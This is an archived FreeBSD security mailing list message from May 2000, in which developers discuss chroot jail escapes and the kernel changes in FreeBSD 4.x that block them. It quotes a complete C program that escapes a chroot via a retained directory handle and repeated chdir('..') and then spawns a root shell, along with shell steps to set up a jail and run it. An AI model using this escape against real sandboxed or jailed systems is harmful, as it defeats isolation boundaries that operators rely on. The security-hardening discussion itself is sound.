Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 23 May 2000 04:39:35 -0700
From:      Don Lewis <Don.Lewis@tsc.tdk.com>
To:        Poul-Henning Kamp <phk@critter.freebsd.dk>, Harold Gutch <logix@foobar.franken.de>
Cc:        Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>, Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@FreeBSD.ORG
Subject:   Re: envy.vuurwerk.nl daily run output
Message-ID:  <200005231139.EAA13204@salsa.gv.tsc.tdk.com>
In-Reply-To: <2780.958684841@critter.freebsd.dk>
References:   <2780.958684841@critter.freebsd.dk>

next in thread | previous in thread | raw e-mail | index | archive | help
On May 18, 11:20pm, Poul-Henning Kamp wrote:
} Subject: Re: envy.vuurwerk.nl daily run output
} 
} Please check the action of the "kern.chroot_allow_open_directories"
} for a deeper explanation of this one.  It is not set to zero for
} fear of compatibility issues.  Maybe we should set it to zero in
} -current to see if there are any such issues.

That only protects against carelessly written chroot wrappers that
leave file descriptors open that point to directories outside the
jail.  Given that, even a non-root process can escape.

Even with kern.chroot_allow_open_directories disabled, I know of
two ways that a process can escape if it can fork() and can
execute chroot() again (the latter requires the process to
be root), unless further modifications have been made to the
chroot syscall.  These changes have been in FreeBSD 4.x and later
since last September.

} In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:

} >What about the "other" chroot-breakout, does it still work under
} >FreeBSD 4.0?

Try statically linking the executable and doing:
	mkdir jail jail/tmp
	cp a.out jail
	chroot jail a.out

This code should be able to escape the jail in 3.x.  In 4.x it will be
able to escape jail/tmp (if kern.chroot_allow_open_directories is enabled)
but it won't be able to escape jail.


} >Here's the breakout-code modulo checks wether /tmp exists etc.
} >
} >#include <fcntl.h>
} >#include <stdlib.h>
} >#include <unistd.h>
} > 
} >int main(int argc, char *argv[])
} >{
} >	int handle, i;
} > 
} >	handle = open("/", O_RDONLY);
} >	chroot("/tmp");
} >	chdir("/");
} >	fchdir(handle);
} >	for (i = 0; i < 32; i++)
} >		chdir("..");
} >	chroot(".");
} >	chdir("/");
} >	system("/bin/sh");
} >
} >	return 0;
} >}


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200005231139.EAA13204>